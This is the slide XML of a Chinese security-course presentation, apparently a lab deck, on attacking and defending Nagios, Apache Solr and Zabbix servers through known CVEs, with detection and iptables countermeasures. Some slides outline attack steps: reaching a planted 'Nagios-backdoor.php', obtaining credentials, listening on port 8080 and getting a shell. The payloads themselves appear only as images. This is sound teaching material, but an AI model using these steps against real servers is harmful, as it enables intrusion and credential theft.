        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8DDB8A35-9C9D-4240-9519-9D369FFDA46D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中有三类用户：根用户，虚拟用户，普通用户。其中普通用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>一般介于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>500-6000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>之间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本如下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2F8194AE-DB93-455A-89A9-7C0C99CD05F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3236636" y="3399183"/>
            <a:ext cx="4791075" cy="3048000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35370868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746741D-32A3-4284-B6B2-636749DCBCFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一些其他的命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="内容占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7CC3394F-BF51-4A33-B060-68D57F91C38C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1660418" y="2001079"/>
            <a:ext cx="7958245" cy="3624228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25680326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D4344FA-67AC-40A2-9CDB-C5EFA160C912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防御效果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="内容占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1D04E2C3-1C77-42B9-8B53-CF7EBB31B93F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="1963864"/>
            <a:ext cx="9906000" cy="3198627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F518BE99-34C1-4216-8F12-3EFE41BE1DB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1842052" y="3482008"/>
            <a:ext cx="1484244" cy="2683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41325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E4FCAEF-5A37-44B0-A9FE-FC0BA6B6AA15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谢谢！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{91330E2E-3144-4BC2-8492-7C5C556E1C66}"/>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15823613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C77A28F-5FA7-4A8A-BF38-B8C57A5F8243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关键部分</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2293626"/>
            <a:ext cx="12192000" cy="238747"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3261220"/>
            <a:ext cx="12192000" cy="33556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5200" y="4419600"/>
            <a:ext cx="6756400" cy="525670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3449995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832B2CE-C0A7-4D24-A616-DE137C557F09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D40DB136-1416-4378-B902-0F036C3D4708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1658143"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开始运行攻击脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9C6C6964-A91B-4E8B-8E7E-4ACD9959F6E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="62319"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="431136" y="2660444"/>
            <a:ext cx="11326552" cy="2971730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30740486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6CEE075-E617-402A-8C26-C36EAE76B69A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="79910"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{EE2AB573-1C9C-4BAF-92DE-81DACD75D8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1204622"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开浏览器，输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>靶机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Nagios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门注入成功，得到路径信息以及用户名密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开始监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{15A27633-2B7F-490B-8B60-166F25C21E29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="32347" r="37911"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5130317" y="2218389"/>
            <a:ext cx="6115438" cy="4639611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18399985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E7546B7-25B5-4494-B9C8-89BE888687E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A25EFBBC-AADF-43FE-B44A-1A0AE32587CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在浏览器中输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>靶机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/Nagios/Nagios-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>backdoor.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接成功，得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5D916ECF-10B3-487A-999F-6194FF789B53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1473829" y="2835454"/>
            <a:ext cx="3307367" cy="312447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E28D4110-85C3-4841-9AB7-8AB6C0896A1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5642811" y="2835454"/>
            <a:ext cx="5075360" cy="3863675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13732381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电路">
  <a:themeElements>
    <a:clrScheme name="电路">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电路">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电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TM04033919[[fn=电路]]</Template>
  <TotalTime>1860</TotalTime>
  <Words>2601</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>207</Paragraphs>
  <Slides>55</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55</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="63" baseType="lpstr">
      <vt:lpstr>DengXian</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>幼圆</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>电路</vt:lpstr>
      <vt:lpstr>企业级网络监控服务网站的攻击与防护</vt:lpstr>
      <vt:lpstr>网站服务</vt:lpstr>
      <vt:lpstr>服务器环境</vt:lpstr>
      <vt:lpstr>Nagios core（cve-2016-9565）</vt:lpstr>
      <vt:lpstr>Exp流程</vt:lpstr>
      <vt:lpstr>Payload关键部分</vt:lpstr>
      <vt:lpstr>攻击过程</vt:lpstr>
      <vt:lpstr>攻击过程</vt:lpstr>
      <vt:lpstr>攻击过程</vt:lpstr>
      <vt:lpstr>后门检测</vt:lpstr>
      <vt:lpstr>防御过程</vt:lpstr>
      <vt:lpstr>编写检测脚本</vt:lpstr>
      <vt:lpstr>入侵检测过程</vt:lpstr>
      <vt:lpstr>入侵检测过程</vt:lpstr>
      <vt:lpstr>防御过程</vt:lpstr>
      <vt:lpstr>添加成功后的iptables规则</vt:lpstr>
      <vt:lpstr>Apache solr （CVE-2017-12629）</vt:lpstr>
      <vt:lpstr>XXE漏洞原理</vt:lpstr>
      <vt:lpstr>XXE漏洞原理</vt:lpstr>
      <vt:lpstr>RCE漏洞原理</vt:lpstr>
      <vt:lpstr>RCE漏洞原理</vt:lpstr>
      <vt:lpstr>RCE漏洞原理</vt:lpstr>
      <vt:lpstr>XXE攻击过程</vt:lpstr>
      <vt:lpstr>XXE攻击过程</vt:lpstr>
      <vt:lpstr>XXE攻击过程</vt:lpstr>
      <vt:lpstr>XXE攻击过程</vt:lpstr>
      <vt:lpstr>XXE攻击过程</vt:lpstr>
      <vt:lpstr>RCE攻击过程</vt:lpstr>
      <vt:lpstr>RCE攻击过程</vt:lpstr>
      <vt:lpstr>RCE攻击过程</vt:lpstr>
      <vt:lpstr>RCE攻击过程</vt:lpstr>
      <vt:lpstr>RCE攻击过程</vt:lpstr>
      <vt:lpstr>RCE攻击过程</vt:lpstr>
      <vt:lpstr>RCE攻击过程</vt:lpstr>
      <vt:lpstr>检测与防御</vt:lpstr>
      <vt:lpstr>检测与防御</vt:lpstr>
      <vt:lpstr>检测与防御结果</vt:lpstr>
      <vt:lpstr>Zabbix 2.0 &lt; 3.0.3 - SQL Injection </vt:lpstr>
      <vt:lpstr>漏洞原理</vt:lpstr>
      <vt:lpstr>漏洞原理</vt:lpstr>
      <vt:lpstr>漏洞原理</vt:lpstr>
      <vt:lpstr>漏洞原理</vt:lpstr>
      <vt:lpstr>漏洞原理</vt:lpstr>
      <vt:lpstr>攻击过程</vt:lpstr>
      <vt:lpstr>攻击过程</vt:lpstr>
      <vt:lpstr>攻击过程</vt:lpstr>
      <vt:lpstr>Zabbix 2.2 &lt; 3.0.3 - RCE with API JSON-RPC（CVE-2017-2824）</vt:lpstr>
      <vt:lpstr>获得shell</vt:lpstr>
      <vt:lpstr>获得shell</vt:lpstr>
      <vt:lpstr>执行结果</vt:lpstr>
      <vt:lpstr>检测与防护</vt:lpstr>
      <vt:lpstr>利用脚本关闭非法用户shell脚本</vt:lpstr>
      <vt:lpstr>一些其他的命令</vt:lpstr>
      <vt:lpstr>防御效果</vt:lpstr>
      <vt:lpstr>谢谢！</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提权与读写漏洞的攻击与防御</dc:title>
  <dc:creator>jolno Yan</dc:creator>
  <cp:lastModifiedBy>Microsoft Office 用户</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-12T03:50:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-13T11:01:17Z</dcterms:modified>
</cp:coreProperties>
</file>